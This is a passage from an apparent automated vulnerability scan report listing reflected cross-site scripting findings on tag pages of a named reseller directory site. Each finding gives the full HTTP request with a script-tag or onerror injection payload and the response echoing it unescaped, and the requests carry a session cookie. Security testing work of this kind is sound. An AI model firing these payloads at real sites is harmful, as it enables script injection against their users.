The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7f3ea<script>alert(1)</script>fb11fe36193 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag7f3ea<script>alert(1)</script>fb11fe36193/uptime+monitoring HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag7f3ea<script>alert(1)</script>fb11fe36193/uptime+monitoring was not found on this server.</p>
...[SNIP]...

2.4653. http://www.resellerbase.com/tag/vaccation [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/vaccation

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 81800<script>alert(1)</script>be379b613fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag81800<script>alert(1)</script>be379b613fb/vaccation HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag81800<script>alert(1)</script>be379b613fb/vaccation was not found on this server.</p>
...[SNIP]...

2.4654. http://www.resellerbase.com/tag/vaccation [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/vaccation

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a55b7<script>alert(1)</script>cccef581c9225d3b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /taga55b7<script>alert(1)</script>cccef581c9225d3b3/vaccation?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/vaccation
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:57:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /taga55b7<script>alert(1)</script>cccef581c9225d3b3/vaccation?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4655. http://www.resellerbase.com/tag/vaccation [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/vaccation

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 2227d</title><img%20src%3da%20onerror%3dalert(1)>883114d19f6afd05e was submitted in the REST URL parameter 2. This input was echoed as 2227d</title><img src=a onerror=alert(1)>883114d19f6afd05e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/vaccation2227d</title><img%20src%3da%20onerror%3dalert(1)>883114d19f6afd05e?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/vaccation
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: vaccation2227d</title><img src=a onerror=alert(1)>883114d19f6afd05e</title>
...[SNIP]...

2.4656. http://www.resellerbase.com/tag/vaccation [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/vaccation

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e6453<img%20src%3da%20onerror%3dalert(1)>acd1559bbc13782f6 was submitted in the REST URL parameter 2. This input was echoed as e6453<img src=a onerror=alert(1)>acd1559bbc13782f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/vaccatione6453<img%20src%3da%20onerror%3dalert(1)>acd1559bbc13782f6?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/vaccation
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: vacca
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : vaccatione6453<img src=a onerror=alert(1)>acd1559bbc13782f6]</td>
...[SNIP]...

2.4657. http://www.resellerbase.com/tag/vaccation [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/vaccation

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b0ae9<img%20src%3da%20onerror%3dalert(1)>c75e49d437b was submitted in the REST URL parameter 2. This input was echoed as b0ae9<img src=a onerror=alert(1)>c75e49d437b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/vaccationb0ae9<img%20src%3da%20onerror%3dalert(1)>c75e49d437b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: vacca
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : vaccationb0ae9<img src=a onerror=alert(1)>c75e49d437b]</td>
...[SNIP]...

2.4658. http://www.resellerbase.com/tag/vaccation [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/vaccation

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload e3f98</title><img%20src%3da%20onerror%3dalert(1)>450a296a467 was submitted in the REST URL parameter 2. This input was echoed as e3f98</title><img src=a onerror=alert(1)>450a296a467 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/vaccatione3f98</title><img%20src%3da%20onerror%3dalert(1)>450a296a467 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: vaccatione3f98</title><img src=a onerror=alert(1)>450a296a467</title>
...[SNIP]...

2.4659. http://www.resellerbase.com/tag/video [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/video

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a1a1d<script>alert(1)</script>92b998eb80489c8b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /taga1a1d<script>alert(1)</script>92b998eb80489c8b1/video?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/video
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /taga1a1d<script>alert(1)</script>92b998eb80489c8b1/video?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4660. http://www.resellerbase.com/tag/video [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/video

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a98d6<script>alert(1)</script>b0acc950819 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /taga98d6<script>alert(1)</script>b0acc950819/video HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:57:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /taga98d6<script>alert(1)</script>b0acc950819/video was not found on this server.</p>
...[SNIP]...

2.4661. http://www.resellerbase.com/tag/video [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/video

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 9303c</title><img%20src%3da%20onerror%3dalert(1)>acfd50e02256f8470 was submitted in the REST URL parameter 2. This input was echoed as 9303c</title><img src=a onerror=alert(1)>acfd50e02256f8470 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/video9303c</title><img%20src%3da%20onerror%3dalert(1)>acfd50e02256f8470?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/video
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: video9303c</title><img src=a onerror=alert(1)>acfd50e02256f8470</title>
...[SNIP]...

2.4662. http://www.resellerbase.com/tag/video [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/video

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 8e19f</title><img%20src%3da%20onerror%3dalert(1)>2fd751c93f8 was submitted in the REST URL parameter 2. This input was echoed as 8e19f</title><img src=a onerror=alert(1)>2fd751c93f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/video8e19f</title><img%20src%3da%20onerror%3dalert(1)>2fd751c93f8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: video8e19f</title><img src=a onerror=alert(1)>2fd751c93f8</title>
...[SNIP]...

2.4663. http://www.resellerbase.com/tag/video [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/video

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 648cb<img%20src%3da%20onerror%3dalert(1)>b23d6872cd3 was submitted in the REST URL parameter 2. This input was echoed as 648cb<img src=a onerror=alert(1)>b23d6872cd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/video648cb<img%20src%3da%20onerror%3dalert(1)>b23d6872cd3 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: video
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : video648cb<img src=a onerror=alert(1)>b23d6872cd3]</td>
...[SNIP]...

2.4664. http://www.resellerbase.com/tag/video [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/video

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 89ed6<img%20src%3da%20onerror%3dalert(1)>2efc0253b2b3a5b8 was submitted in the REST URL parameter 2. This input was echoed as 89ed6<img src=a onerror=alert(1)>2efc0253b2b3a5b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/video89ed6<img%20src%3da%20onerror%3dalert(1)>2efc0253b2b3a5b8?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/video
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9798

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: video
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : video89ed6<img src=a onerror=alert(1)>2efc0253b2b3a5b8]</td>
...[SNIP]...

2.4665. http://www.resellerbase.com/tag/web+cam [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/web+cam

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9c662<script>alert(1)</script>97ca3e5463d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag9c662<script>alert(1)</script>97ca3e5463d/web+cam HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag9c662<script>alert(1)</script>97ca3e5463d/web+cam was not found on this server.</p>
...[SNIP]...

2.4666. http://www.resellerbase.com/tag/web+cam [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/web+cam

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 667d0<script>alert(1)</script>49948159d41db7245 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag667d0<script>alert(1)</script>49948159d41db7245/web+cam?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/web+cam
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag667d0<script>alert(1)</script>49948159d41db7245/web+cam?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4667. http://www.resellerbase.com/tag/web+cam [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/web+cam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload d17ec</title><img%20src%3da%20onerror%3dalert(1)>ae7643ed689c6d2a5 was submitted in the REST URL parameter 2. This input was echoed as d17ec</title><img src=a onerror=alert(1)>ae7643ed689c6d2a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/web+camd17ec</title><img%20src%3da%20onerror%3dalert(1)>ae7643ed689c6d2a5?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/web+cam
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: web camd17ec</title><img src=a onerror=alert(1)>ae7643ed689c6d2a5</title>
...[SNIP]...

2.4668. http://www.resellerbase.com/tag/web+cam [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/web+cam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f0a47<img%20src%3da%20onerror%3dalert(1)>223dbb6790d was submitted in the REST URL parameter 2. This input was echoed as f0a47<img src=a onerror=alert(1)>223dbb6790d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/web+camf0a47<img%20src%3da%20onerror%3dalert(1)>223dbb6790d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: web c
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : web camf0a47<img src=a onerror=alert(1)>223dbb6790d]</td>
...[SNIP]...

2.4669. http://www.resellerbase.com/tag/web+cam [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/web+cam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 32a29<img%20src%3da%20onerror%3dalert(1)>5a6694fcd02dcc332 was submitted in the REST URL parameter 2. This input was echoed as 32a29<img src=a onerror=alert(1)>5a6694fcd02dcc332 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

